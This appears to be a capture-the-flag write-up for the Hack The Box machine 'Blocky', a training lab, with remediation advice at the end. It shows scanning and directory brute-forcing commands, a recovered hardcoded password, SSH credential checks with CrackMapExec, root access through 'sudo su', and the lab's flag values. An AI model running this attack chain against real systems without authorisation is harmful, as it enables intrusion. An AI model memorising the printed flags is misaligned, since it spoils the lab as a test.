htb-writeups

Blocky HTB Writeup

Reconnaissance

Initial Enumeration

The penetration testing began with network reconnaissance to identify open ports and services.

export target=10.129.48.128

Comprehensive Port Scan

sudo nmap -p- --min-rate 5000 -sT -vvv $target

Targeted Service Enumeration

sudo nmap -p 21,22,80,25565 -sC -sV -T4 $target

DNS Configuration

Added the hostname to the local hosts file for proper web application testing:

echo "10.129.48.128 blocky.htb" | sudo tee -a /etc/hosts

Web Application Assessment

Directory Bruteforcing

Conducted comprehensive directory enumeration using Gobuster:

gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html -t 100 -b "302"

Also you can use dirbuster

Critical Discovery

The /plugins/ directory was identified as particularly interesting, containing Java archive files:

• BlockyCore.jar
• griefprevention-1.12.2-4.3.0.660.jar

Source Code Analysis

Using jadx-gui, the BlockyCore.jar file was decompiled, revealing hardcoded database credentials:

Credentials Found:

• Username: root
• Password: 8YsqfCTnvxAUeduzjNSXe22

User Enumeration

Additional reconnaissance uncovered potential usernames:

• Visiting http://blocky.htb/index.php/author/notch/ revealed user “notch”
• Source code analysis confirmed both “notch” and “root” as valid users

Initial Access

Credential Validation

Verified SSH credentials using CrackMapExec:

crackmapexec ssh 10.129.48.128 -u users.txt -p pass.txt

Successful Authentication

Gained initial access via SSH using discovered credentials:

ssh notch@10.129.48.174

Privilege Escalation

Privilege Assessment

Checked sudo permissions for the notch user:

sudo -l

Root Access Acquisition

The notch user had extensive sudo privileges, allowing direct elevation to root:

sudo su

Post-Exploitation

Flag Extraction

User Flag:

cat /home/notch/user.txt
83d32e43c1d7bdb805813bc15394c761

Root Flag:

cat /root/root.txt
97f70114622d2f0ec00963ed1caa998b

Security Assessment Summary

Critical Vulnerabilities Identified

1. Information Disclosure
   • Hardcoded credentials in compiled Java binaries
   • Directory listing enabled on web server
2. Weak Access Controls
   • Excessive sudo privileges for standard user accounts
   • Reuse of database credentials for system authentication
3. Poor Credential Management
   • Plaintext passwords in application binaries
   • Password reuse across different services

Remediation Recommendations

1. Implement Secure Coding Practices
   • Remove hardcoded credentials from application code
   • Use secure credential storage solutions
2. Enforce Principle of Least Privilege
   • Review and restrict sudo permissions
   • Implement role-based access control
3. Enhance System Hardening
   • Disable directory listing on web servers
   • Implement regular security audits
   • Use credential rotation policies

Technical Details

Attack Chain

1. Network reconnaissance → 2. Web directory enumeration → 3. Source code analysis → 4. Credential discovery → 5. SSH authentication → 6. Privilege escalation

Tools Utilized

• Nmap: Network scanning and service enumeration
• Gobuster: Web directory bruteforcing
• JADX: Java decompilation and static analysis
• CrackMapExec: Credential validation
• SSH: Remote access